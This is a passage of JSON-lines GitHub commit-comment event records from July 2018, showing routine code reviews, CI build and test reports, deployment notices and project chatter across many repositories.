{"id":"7915311425","type":"CommitCommentEvent","actor":{"login":"aeciorc"},"repo":{"name":"constxd/3130project"},"payload":{"comment":{"id":29587867,"position":null,"line":null,"path":null,"commit_id":"2bdd71379cf94c44db8c901921bd61377aa77d33","created_at":"2018-07-03T22:31:33Z","updated_at":"2018-07-03T22:31:33Z","author_association":"COLLABORATOR","body":"lol my bad"}},"created_at":"2018-07-03T22:31:33Z"}
{"id":"7915312864","type":"CommitCommentEvent","actor":{"login":"slimlime"},"repo":{"name":"mgechev/revive"},"payload":{"comment":{"id":29587872,"position":null,"line":null,"path":null,"commit_id":"03eef8b31a783192b253ff99aca8f21246c3e995","created_at":"2018-07-03T22:32:00Z","updated_at":"2018-07-03T22:32:00Z","author_association":"NONE","body":"Great logo, logopher! 👍 "}},"created_at":"2018-07-03T22:32:00Z"}
{"id":"7915312868","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29587873,"position":null,"line":null,"path":null,"commit_id":"407962e55224e19958b6411943b35cec8a888b4a","created_at":"2018-07-03T22:32:00Z","updated_at":"2018-07-03T22:32:00Z","author_association":"NONE","body":"3982683-EIRFormulatedWWHP (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2933 of 2934 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-407962e55224e19958b6411943b35cec8a888b4a-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-407962e55224e19958b6411943b35cec8a888b4a-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-03T22:32:00Z"}
{"id":"7915316414","type":"CommitCommentEvent","actor":{"login":"Rexagon"},"repo":{"name":"ITLabRTUMIREA/ITLab-Front"},"payload":{"comment":{"id":29587875,"position":null,"line":null,"path":null,"commit_id":"447ebe407825a35d8b8cb34e24f5075256f8f30f","created_at":"2018-07-03T22:33:08Z","updated_at":"2018-07-03T22:33:08Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Сделать поиск по EquipmentType, так же как и в EventType (?all=``&match=``)](https://trello.com/c/gjoaZsWG/50-%D1%81%D0%B4%D0%B5%D0%BB%D0%B0%D1%82%D1%8C-%D0%BF%D0%BE%D0%B8%D1%81%D0%BA-%D0%BF%D0%BE-equipmenttype-%D1%82%D0%B0%D0%BA-%D0%B6%D0%B5-%D0%BA%D0%B0%D0%BA-%D0%B8-%D0%B2-eventtype-allmatch)"}},"created_at":"2018-07-03T22:33:08Z"}
{"id":"7915316950","type":"CommitCommentEvent","actor":{"login":"kenerwin88"},"repo":{"name":"chef-cookbooks/windows"},"payload":{"comment":{"id":29587880,"position":null,"line":null,"path":null,"commit_id":"d6a276a63879488dea74c465d773642cbd5123f2","created_at":"2018-07-03T22:33:18Z","updated_at":"2018-07-03T22:33:18Z","author_association":"NONE","body":"This is actually needed on Server 2008R2 (Import-Module ServerManager), even with PowerShell 3.0.  By removing it, the majority of the features (especially IIS features), won't be found. :("}},"created_at":"2018-07-03T22:33:18Z"}
{"id":"7915317228","type":"CommitCommentEvent","actor":{"login":"Rexagon"},"repo":{"name":"ITLabRTUMIREA/ITLab-Front"},"payload":{"comment":{"id":29587881,"position":null,"line":null,"path":null,"commit_id":"447ebe407825a35d8b8cb34e24f5075256f8f30f","created_at":"2018-07-03T22:33:23Z","updated_at":"2018-07-03T22:33:23Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Даты при передаче интерпретируются неправильно. Где-то не учитывается часовой пояс](https://trello.com/c/e2VgXRsI/48-%D0%B4%D0%B0%D1%82%D1%8B-%D0%BF%D1%80%D0%B8-%D0%BF%D0%B5%D1%80%D0%B5%D0%B4%D0%B0%D1%87%D0%B5-%D0%B8%D0%BD%D1%82%D0%B5%D1%80%D0%BF%D1%80%D0%B5%D1%82%D0%B8%D1%80%D1%83%D1%8E%D1%82%D1%81%D1%8F-%D0%BD%D0%B5%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D0%BB%D1%8C%D0%BD%D0%BE-%D0%B3%D0%B4%D0%B5-%D1%82%D0%BE-%D0%BD%D0%B5-%D1%83%D1%87%D0%B8%D1%82%D1%8B%D0%B2%D0%B0%D0%B5%D1%82%D1%81%D1%8F-%D1%87%D0%B0%D1%81%D0%BE%D0%B2%D0%BE%D0%B9-%D0%BF%D0%BE%D1%8F%D1%81)"}},"created_at":"2018-07-03T22:33:23Z"}
{"id":"7915324716","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29587896,"position":null,"line":null,"path":null,"commit_id":"407962e55224e19958b6411943b35cec8a888b4a","created_at":"2018-07-03T22:35:48Z","updated_at":"2018-07-03T22:35:48Z","author_association":"NONE","body":"3982683-EIRFormulatedWWHP (Myoldmopar) - x86_64-MacOS-10.9-clang: Tests Failed (1386 of 2934 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 625\n\nregression Test Summary\n * Passed: 622\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-407962e55224e19958b6411943b35cec8a888b4a-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-407962e55224e19958b6411943b35cec8a888b4a-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.24%25-red.png)</a> \n"}},"created_at":"2018-07-03T22:35:48Z"}
{"id":"7915328452","type":"CommitCommentEvent","actor":{"login":"hypotext"},"repo":{"name":"penrose/penrose"},"payload":{"comment":{"id":29587906,"position":null,"line":null,"path":null,"commit_id":"3c5bede72b0460c38e9c99f37f9a7484b493a412","created_at":"2018-07-03T22:36:58Z","updated_at":"2018-07-03T22:36:58Z","author_association":"MEMBER","body":"Basic matching works now. Repro:\r\n\r\n`runpenrose sub/linearMap.sub sty/test-sty-match.sty dsll/algebra.dsl`\r\n\r\ne.g. for this Substance program:\r\n\r\n```\r\nScalar x\r\nScalar y\r\nVectorSpace U\r\nVectorSpace V\r\nVectorSpace W\r\nVector a\r\nVector b\r\nVector c\r\nLinearMap f\r\nLinearMap g\r\nLinearMap h\r\n\r\nIn(a, U)\r\nIn(b, U)\r\nIn(c, V)\r\nFrom(f, U, V)\r\nFrom(g, V, U)\r\nFrom(h, U, U)\r\n```\r\n\r\nand this selector:\r\n\r\n```\r\nVector v; LinearMap f\r\nwith VectorSpace `V`; VectorSpace U\r\nwhere In(v, `V`); From(f, `V`, U) { }\r\n```\r\n\r\nwe get the following substitutions:\r\n\r\n```\r\n[ fromList\r\n    [ ( StyVar' \"U\" , VarConst \"U\" )\r\n    , ( StyVar' \"f\" , VarConst \"g\" )\r\n    , ( StyVar' \"v\" , VarConst \"c\" )\r\n    ]\r\n]\r\n```\r\n\r\n(It also works for selectors with multiple substitutions)"}},"created_at":"2018-07-03T22:36:58Z"}
{"id":"7915329943","type":"CommitCommentEvent","actor":{"login":"mnazary"},"repo":{"name":"datacamp/authoring"},"payload":{"comment":{"id":29587910,"position":null,"line":null,"path":null,"commit_id":"7eb76855c49b6a62c1d84f8281c42d4a399c46b8","created_at":"2018-07-03T22:37:25Z","updated_at":"2018-07-03T22:37:25Z","author_association":"CONTRIBUTOR","body":"@richierocks , is this better? Let me know when you have the chance - no rush. Thanks!"}},"created_at":"2018-07-03T22:37:25Z"}
{"id":"7915333228","type":"CommitCommentEvent","actor":{"login":"chris-stg"},"repo":{"name":"chris-stg/mod-gift-guide"},"payload":{"comment":{"id":29587917,"position":null,"line":null,"path":null,"commit_id":"c2245bc8335d95413cf705d063f4d9600b1a228e","created_at":"2018-07-03T22:38:25Z","updated_at":"2018-07-03T22:38:25Z","author_association":"OWNER","body":"Created multidev environment [mod-gift-guide#ci-29](https://dashboard.pantheon.io/sites/72035e91-bbeb-4fea-aa37-97b7ccd79d43#ci-29).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-29-mod-gift-guide.pantheonsite.io/)"}},"created_at":"2018-07-03T22:38:25Z"}
{"id":"7915333528","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29587918,"position":null,"line":null,"path":null,"commit_id":"92518aef1ca4e293f5d571d0635f4ba329f9ea5d","created_at":"2018-07-03T22:38:31Z","updated_at":"2018-07-03T22:38:31Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-686](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-686).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-686-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-03T22:38:31Z"}
{"id":"7915337163","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29587925,"position":null,"line":null,"path":null,"commit_id":"15206f67c94dacda2e27be21f3b4afbc3a8db091","created_at":"2018-07-03T22:39:40Z","updated_at":"2018-07-03T22:39:40Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-639](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-639).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-639-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-03T22:39:40Z"}
{"id":"7915344138","type":"CommitCommentEvent","actor":{"login":"javier-molina"},"repo":{"name":"AtlasOfLivingAustralia/biocache-service"},"payload":{"comment":{"id":29587936,"position":null,"line":null,"path":null,"commit_id":"a211f3da33119ea1e566291bc5ed9033ef787788","created_at":"2018-07-03T22:41:41Z","updated_at":"2018-07-03T22:41:41Z","author_association":"CONTRIBUTOR","body":"Not that I'm aware of\n\nOn Wed, 4 Jul 2018, 1:53 AM Dave Martin <notifications@github.com> wrote:\n\n> i think its intentional that sensitive_latitude, sensitive_longitude are\n> not in indexFieldMaps.\n> Is this causing a problem elsewhere ?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/AtlasOfLivingAustralia/biocache-service/commit/a211f3da33119ea1e566291bc5ed9033ef787788#commitcomment-29583305>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AH8M-qIQG1pCR1Rd7dnUZHUk-gs_EOwHks5uC5OAgaJpZM4U8rej>\n> .\n>\n"}},"created_at":"2018-07-03T22:41:41Z"}
{"id":"7915349729","type":"CommitCommentEvent","actor":{"login":"simon-frank"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29587945,"position":null,"line":null,"path":null,"commit_id":"220f59c329f8d3dd4b32e445c52a345de5335156","created_at":"2018-07-03T22:43:37Z","updated_at":"2018-07-03T22:43:37Z","author_association":"COLLABORATOR","body":"Aber echt bra"}},"created_at":"2018-07-03T22:43:37Z"}
{"id":"7915353721","type":"CommitCommentEvent","actor":{"login":"coltonhurst"},"repo":{"name":"coltonhurst/pep8-asm"},"payload":{"comment":{"id":29587958,"position":null,"line":null,"path":null,"commit_id":"bf77f2ec761f302150e67b40921690025e4b853e","created_at":"2018-07-03T22:45:01Z","updated_at":"2018-07-03T22:45:01Z","author_association":"OWNER","body":"Meant to say folder... not src file!"}},"created_at":"2018-07-03T22:45:01Z"}
{"id":"7915356634","type":"CommitCommentEvent","actor":{"login":"vvvroger"},"repo":{"name":"vvvroger/canaispg"},"payload":{"comment":{"id":29587964,"position":1,"line":1,"path":"README.md","commit_id":"be0912d34be1354f7e9c98c37803e35f6e68eb9f","created_at":"2018-07-03T22:46:02Z","updated_at":"2018-07-03T22:46:02Z","author_association":"OWNER","body":"\r\nhttp://paraisotv.ddns.net:80/066/myStream/live.m3u8"}},"created_at":"2018-07-03T22:46:02Z"}
{"id":"7915361390","type":"CommitCommentEvent","actor":{"login":"Sivaraman-R"},"repo":{"name":"Sivaraman-R/DemoVSTS"},"payload":{"comment":{"id":29587976,"position":null,"line":null,"path":null,"commit_id":"901c1110cd0f3f3d0f4ee817c92e7e0703eca971","created_at":"2018-07-03T22:47:42Z","updated_at":"2018-07-03T22:47:42Z","author_association":"OWNER","body":"Approved"}},"created_at":"2018-07-03T22:47:42Z"}
{"id":"7915362494","type":"CommitCommentEvent","actor":{"login":"MeetRat"},"repo":{"name":"MeetRat/MeetRat.github.io"},"payload":{"comment":{"id":29587978,"position":null,"line":null,"path":null,"commit_id":"43aef582a8314cc39c188fdbb4675a7bebd05b65","created_at":"2018-07-03T22:48:06Z","updated_at":"2018-07-03T22:48:06Z","author_association":"OWNER","body":"comments"}},"created_at":"2018-07-03T22:48:06Z"}
{"id":"7915365413","type":"CommitCommentEvent","actor":{"login":"AutoHunter"},"repo":{"name":"AutoHunter/chefling_prod"},"payload":{"comment":{"id":29587982,"position":41,"line":210,"path":"intents/intent_pantry.py","commit_id":"c24cbfd0d746f63778a5afa4d6ba11cb877d7644","created_at":"2018-07-03T22:49:04Z","updated_at":"2018-07-03T22:49:04Z","author_association":"OWNER","body":"_logging.info_ may be deleted in future"}},"created_at":"2018-07-03T22:49:04Z"}
{"id":"7915366927","type":"CommitCommentEvent","actor":{"login":"younghankss"},"repo":{"name":"behumble/showlicense"},"payload":{"comment":{"id":29587988,"position":5,"line":29,"path":"pom.xml","commit_id":"d9311b9491ab3820b5c369c25f27d6664cd0a587","created_at":"2018-07-03T22:49:32Z","updated_at":"2018-07-03T22:49:32Z","author_association":"NONE","body":"Build\r\n"}},"created_at":"2018-07-03T22:49:32Z"}
{"id":"7915368843","type":"CommitCommentEvent","actor":{"login":"Selectah"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29587991,"position":null,"line":null,"path":null,"commit_id":"02f0b4c9423bbb0559ed537359d95acb614f573d","created_at":"2018-07-03T22:50:08Z","updated_at":"2018-07-03T22:50:08Z","author_association":"NONE","body":"https://www.youtube.com/watch?v=FZOlgjA1ZV0 the video on your FireFly issue tracker from the old Retail has the same. So this works as intended :) "}},"created_at":"2018-07-03T22:50:08Z"}
{"id":"7915371822","type":"CommitCommentEvent","actor":{"login":"AutoHunter"},"repo":{"name":"AutoHunter/chefling_prod"},"payload":{"comment":{"id":29587994,"position":235,"line":717,"path":"intents/intent_pantry.py","commit_id":"c24cbfd0d746f63778a5afa4d6ba11cb877d7644","created_at":"2018-07-03T22:51:07Z","updated_at":"2018-07-03T22:51:07Z","author_association":"OWNER","body":"_logging.info_ may be deleted in future"}},"created_at":"2018-07-03T22:51:07Z"}
{"id":"7915375594","type":"CommitCommentEvent","actor":{"login":"mythmon"},"repo":{"name":"mozilla/normandy"},"payload":{"comment":{"id":29587998,"position":24,"line":102,"path":"normandy/base/api/authentication.py","commit_id":"dffab89b4da35116344a65af5b476868e2f9346f","created_at":"2018-07-03T22:52:20Z","updated_at":"2018-07-03T22:52:20Z","author_association":"MEMBER","body":"A default of 0 is probably going to do weird things, like set the cache to expire in negative 50 years. Maybe the default should be `now` Or `now + 60`?"}},"created_at":"2018-07-03T22:52:20Z"}
{"id":"7915376165","type":"CommitCommentEvent","actor":{"login":"raphaelUfscar"},"repo":{"name":"raphaelUfscar/arduino"},"payload":{"comment":{"id":29587999,"position":null,"line":null,"path":null,"commit_id":"bdd5528c90216499c617fdb2a093e1213dc5aa5c","created_at":"2018-07-03T22:52:32Z","updated_at":"2018-07-03T22:52:32Z","author_association":"OWNER","body":"Rele foi deletado para verificar se a troca da pasta \"Arduido\" no desktop alterou o destino no github. A conclusão: Não é alterado."}},"created_at":"2018-07-03T22:52:32Z"}
{"id":"7915378118","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":29588002,"position":null,"line":null,"path":null,"commit_id":"3138255670a0e6df6080bc942734df93962e66ae","created_at":"2018-07-03T22:53:11Z","updated_at":"2018-07-03T22:53:11Z","author_association":"CONTRIBUTOR","body":"I wonder what the Void Sprites + Archons + Pug will look like."}},"created_at":"2018-07-03T22:53:11Z"}
{"id":"7915380140","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"conda-forge/vic-feedstock"},"payload":{"comment":{"id":29588005,"position":null,"line":null,"path":null,"commit_id":"5d3bd32afd5a1ea6839fc115e950b383ed840f05","created_at":"2018-07-03T22:53:52Z","updated_at":"2018-07-03T22:53:52Z","author_association":"MEMBER","body":"may want to restart one of the circle builds which had a flaky connectivity failure https://circleci.com/gh/conda-forge/vic-feedstock/7?utm_campaign=vcs-integration-link&utm_medium=referral&utm_source=github-build-link"}},"created_at":"2018-07-03T22:53:52Z"}
{"id":"7915380866","type":"CommitCommentEvent","actor":{"login":"Wagnard"},"repo":{"name":"Wagnard/display-drivers-uninstaller"},"payload":{"comment":{"id":29588006,"position":null,"line":null,"path":null,"commit_id":"48c387d42f516f231716cd3ad0fd8b2490e339d9","created_at":"2018-07-03T22:54:07Z","updated_at":"2018-07-03T22:54:07Z","author_association":"OWNER","body":"Release v17.0.8.8"}},"created_at":"2018-07-03T22:54:07Z"}
{"id":"7915384632","type":"CommitCommentEvent","actor":{"login":"simon-frank"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29588013,"position":null,"line":null,"path":null,"commit_id":"54c0e6267b7243717690d1bca0b59ed62d0d0112","created_at":"2018-07-03T22:55:22Z","updated_at":"2018-07-03T22:55:22Z","author_association":"COLLABORATOR","body":"It will the fixed but pleace change to the old test!!! "}},"created_at":"2018-07-03T22:55:22Z"}
{"id":"7915385541","type":"CommitCommentEvent","actor":{"login":"ali-makhmali"},"repo":{"name":"i-novation/ngx-datatable"},"payload":{"comment":{"id":29588014,"position":null,"line":null,"path":null,"commit_id":"1964db1f7ed6f0a9f1ac986b72f2491cec0b4fe0","created_at":"2018-07-03T22:55:39Z","updated_at":"2018-07-03T22:55:39Z","author_association":"NONE","body":"Hi, I installed version \"@swimlane/ngx-datatable\": \"^13.0.1\" to use the draggable rows, but I receive this message: Can't bind to 'rowsDraggable' since it isn't a known property of 'ngx-datatable'.\r\n\r\nCan you please help?"}},"created_at":"2018-07-03T22:55:39Z"}
{"id":"7915386654","type":"CommitCommentEvent","actor":{"login":"ZirconiumX"},"repo":{"name":"MoochMcGee/Emotionless"},"payload":{"comment":{"id":29588017,"position":6,"line":6,"path":"src/scph30000.cpp","commit_id":"44f924de12a9982025df983d4f76dfc1ed4dbdda","created_at":"2018-07-03T22:56:01Z","updated_at":"2018-07-03T22:56:01Z","author_association":"NONE","body":"I don't want to be that guy, but can't you just use `calloc` here instead of `malloc`/`memset`?"}},"created_at":"2018-07-03T22:56:01Z"}
{"id":"7915389937","type":"CommitCommentEvent","actor":{"login":"fredrikekre"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29588023,"position":28,"line":41,"path":"stdlib/Base64/src/Base64.jl","commit_id":"15a345bf74a27429bc4bb0c33b99a9151d65a735","created_at":"2018-07-03T22:57:05Z","updated_at":"2018-07-03T22:57:05Z","author_association":"CONTRIBUTOR","body":"This should be `context=context` I assume? From https://github.com/JuliaDocs/Documenter.jl/pull/738 test logs\r\n\r\n```\r\nERROR: LoadError: LoadError: MethodError: no method matching IOContext(::Base64.Base64EncodePipe, ::Type{IOContext})\r\nClosest candidates are:\r\n  IOContext(::IO, ::Any, ::Any) at deprecated.jl:53\r\n  IOContext(::IO; kws...) at deprecated.jl:523\r\n  IOContext(::IO, ::Base.ImmutableDict) at show.jl:183\r\n  ...\r\nStacktrace:\r\n [1] #base64encode#3(::Type, ::Function, ::Function, ::MIME{Symbol(\"image/png\")}, ::Vararg{Any,N} where N) at /buildworker/worker/package_linux64/build/usr/share/julia/stdlib/v0.7/Base64/src/encode.jl:208\r\n```\r\ncc @stevengj "}},"created_at":"2018-07-03T22:57:05Z"}
{"id":"7915394370","type":"CommitCommentEvent","actor":{"login":"jvinod"},"repo":{"name":"portworx/kvdb"},"payload":{"comment":{"id":29588037,"position":10,"line":297,"path":"consul/kv_consul.go","commit_id":"5718c4203475b8d309ecae342c69e115273d2ed9","created_at":"2018-07-03T22:58:36Z","updated_at":"2018-07-03T22:58:36Z","author_association":"MEMBER","body":"This still swallows the orginal error and returns error from kv.Delete()"}},"created_at":"2018-07-03T22:58:36Z"}
{"id":"7915399021","type":"CommitCommentEvent","actor":{"login":"basvandijk"},"repo":{"name":"LumiGuide/nixpkgs"},"payload":{"comment":{"id":29588050,"position":null,"line":null,"path":null,"commit_id":"8c69ad8bd91a41ba210703c43fc5331429dcf79a","created_at":"2018-07-03T23:00:11Z","updated_at":"2018-07-03T23:00:11Z","author_association":"NONE","body":"I've made the following progress in https://github.com/LumiGuide/nixpkgs/commit/a6b656717a1f8a61c1e990e9587c39928a9fb959.\r\n\r\n* ELK is upgraded to 6.3.0.\r\n\r\n* `elasticsearch6`, `logstash6` and `kibana6` now come with X-pack which is a suite of additional features. These are however licensed under the \"Elastic License\".\r\n\r\n* Fortunately they also provide OSS versions which I packaged under: `elasticsearch6-oss`, `logstash6-oss` and `kibana6-oss`.\r\n\r\n* `nix-build nixos/tests/elk.nix -A ELK-6` now succeeds again. By default the test works with the OSS versions of ELK.\r\n\r\n* You can also run the test on the unfree ELK using:\r\n`$ NIXPKGS_ALLOW_UNFREE=1 nix-build nixos/tests/elk.nix -A ELK-6 --arg enableUnfree true`\r\nThis however, still fails. Working on it...\r\n\r\n\r\n"}},"created_at":"2018-07-03T23:00:11Z"}
{"id":"7915399342","type":"CommitCommentEvent","actor":{"login":"chris-stg"},"repo":{"name":"chris-stg/mod-gift-guide"},"payload":{"comment":{"id":29588052,"position":null,"line":null,"path":null,"commit_id":"a0a9be5debe37277db1bb7f7e42fbead46450df7","created_at":"2018-07-03T23:00:16Z","updated_at":"2018-07-03T23:00:16Z","author_association":"OWNER","body":"Created multidev environment [mod-gift-guide#ci-31](https://dashboard.pantheon.io/sites/72035e91-bbeb-4fea-aa37-97b7ccd79d43#ci-31).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-31-mod-gift-guide.pantheonsite.io/)"}},"created_at":"2018-07-03T23:00:16Z"}
{"id":"7915402465","type":"CommitCommentEvent","actor":{"login":"Manuel-777"},"repo":{"name":"Manuel-777/MTG-Arena-Tool"},"payload":{"comment":{"id":29588061,"position":null,"line":null,"path":null,"commit_id":"7249b1094bb04c62540ab6a3cc469d8a0786b2a8","created_at":"2018-07-03T23:01:13Z","updated_at":"2018-07-03T23:01:13Z","author_association":"OWNER","body":"Fixes #2 "}},"created_at":"2018-07-03T23:01:13Z"}
{"id":"7915404133","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29588064,"position":null,"line":null,"path":null,"commit_id":"ed60e63401f97b23f300d34b3c2dac4248b6143a","created_at":"2018-07-03T23:01:49Z","updated_at":"2018-07-03T23:01:49Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-688](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-688).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-688-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-03T23:01:49Z"}
{"id":"7915405300","type":"CommitCommentEvent","actor":{"login":"sangleganesh"},"repo":{"name":"portworx/kvdb"},"payload":{"comment":{"id":29588068,"position":10,"line":297,"path":"consul/kv_consul.go","commit_id":"5718c4203475b8d309ecae342c69e115273d2ed9","created_at":"2018-07-03T23:02:12Z","updated_at":"2018-07-03T23:02:12Z","author_association":"CONTRIBUTOR","body":"yes, @sdeoras can you just log the error here. "}},"created_at":"2018-07-03T23:02:12Z"}
{"id":"7915405962","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29588070,"position":null,"line":null,"path":null,"commit_id":"208674e4fd06c7f9505a531870da6290f540f73a","created_at":"2018-07-03T23:02:27Z","updated_at":"2018-07-03T23:02:27Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-34](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-34).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-34-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-03T23:02:27Z"}
{"id":"7915411486","type":"CommitCommentEvent","actor":{"login":"dmadisetti"},"repo":{"name":"AnotherGroupChat/maeve"},"payload":{"comment":{"id":29588080,"position":19,"line":27,"path":"README.md","commit_id":"674efd4675b7539f149bf3af200f000b25d84d84","created_at":"2018-07-03T23:04:19Z","updated_at":"2018-07-03T23:04:19Z","author_association":"CONTRIBUTOR","body":"Thoughts of putting this in a .sh?"}},"created_at":"2018-07-03T23:04:19Z"}
{"id":"7915411950","type":"CommitCommentEvent","actor":{"login":"ChristoNik"},"repo":{"name":"ChristoNik/gtfebproject3"},"payload":{"comment":{"id":29588083,"position":null,"line":null,"path":null,"commit_id":"26dbfffe72f5a8b0e58e712bf972ef07fd591060","created_at":"2018-07-03T23:04:29Z","updated_at":"2018-07-03T23:04:29Z","author_association":"OWNER","body":"our team"}},"created_at":"2018-07-03T23:04:29Z"}
{"id":"7915414900","type":"CommitCommentEvent","actor":{"login":"dmadisetti"},"repo":{"name":"AnotherGroupChat/maeve"},"payload":{"comment":{"id":29588089,"position":25,"line":33,"path":"README.md","commit_id":"674efd4675b7539f149bf3af200f000b25d84d84","created_at":"2018-07-03T23:05:32Z","updated_at":"2018-07-03T23:05:32Z","author_association":"CONTRIBUTOR","body":"Hmm. Won't be able to test this for like 2 months. By why is the sh needed? Is there a way to drop you directly into Maeve?"}},"created_at":"2018-07-03T23:05:32Z"}
{"id":"7915415534","type":"CommitCommentEvent","actor":{"login":"dmadisetti"},"repo":{"name":"AnotherGroupChat/maeve"},"payload":{"comment":{"id":29588090,"position":null,"line":null,"path":null,"commit_id":"674efd4675b7539f149bf3af200f000b25d84d84","created_at":"2018-07-03T23:05:45Z","updated_at":"2018-07-03T23:05:45Z","author_association":"CONTRIBUTOR","body":"Doooooope"}},"created_at":"2018-07-03T23:05:45Z"}
{"id":"7915418467","type":"CommitCommentEvent","actor":{"login":"ZirconiumX"},"repo":{"name":"MoochMcGee/Emotionless"},"payload":{"comment":{"id":29588095,"position":403,"line":403,"path":"src/scph30000.cpp","commit_id":"44f924de12a9982025df983d4f76dfc1ed4dbdda","created_at":"2018-07-03T23:06:47Z","updated_at":"2018-07-03T23:06:47Z","author_association":"NONE","body":"Wrapped copies like this should go in a function, I think, because there's a lot of code duplication."}},"created_at":"2018-07-03T23:06:47Z"}
{"id":"7915419041","type":"CommitCommentEvent","actor":{"login":"dhyansraj"},"repo":{"name":"synechron-finlabs/quorum-maker"},"payload":{"comment":{"id":29588096,"position":null,"line":null,"path":null,"commit_id":"c48466c213509b0e6186f7ebe8fd1e7466dc0d19","created_at":"2018-07-03T23:06:59Z","updated_at":"2018-07-03T23:06:59Z","author_association":"COLLABORATOR","body":"FYI Added constetllation.conf back in development branch. "}},"created_at":"2018-07-03T23:06:59Z"}
{"id":"7915423715","type":"CommitCommentEvent","actor":{"login":"chris-stg"},"repo":{"name":"chris-stg/mod-gift-guide"},"payload":{"comment":{"id":29588105,"position":null,"line":null,"path":null,"commit_id":"a0a9be5debe37277db1bb7f7e42fbead46450df7","created_at":"2018-07-03T23:08:28Z","updated_at":"2018-07-03T23:08:28Z","author_association":"OWNER","body":"Created multidev environment [mod-gift-guide#ci-34](https://dashboard.pantheon.io/sites/72035e91-bbeb-4fea-aa37-97b7ccd79d43#ci-34).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-34-mod-gift-guide.pantheonsite.io/)"}},"created_at":"2018-07-03T23:08:28Z"}
{"id":"7915427689","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29588108,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-03T23:09:59Z","updated_at":"2018-07-03T23:09:59Z","author_association":"NONE","body":"I wonder if the purpose of these tests was to provide evidence in order to generate discussion about the policy on [0, 5] combo patches.\r\n\r\nIf Elo can be reliably gained by such patches, perhaps there is an untapped opportunity here.  If the guidelines' goal was to protect our limited computational resources, perhaps we can consider revising them in light of our recently substantially increased capabilities.  (Permitting [0, 5] combos could potentially dramatically increase the number of tests run.)  Several other revisions have also been proposed recently and generated productive discussions (e.g., higher TC for STC tests, more sensitive SPRT bounds, etc.).\r\n\r\nI think this proposal by @locutus2, which not many other people have responded to yet, merits serious consideration alongside these.\r\n\r\n> I'm not against functional combo patches. But it should be combined so little number of patches as possible and the raised complexity should be compensated by higher test bounds (which also reduce the chance of a simplification). Par example: two functional 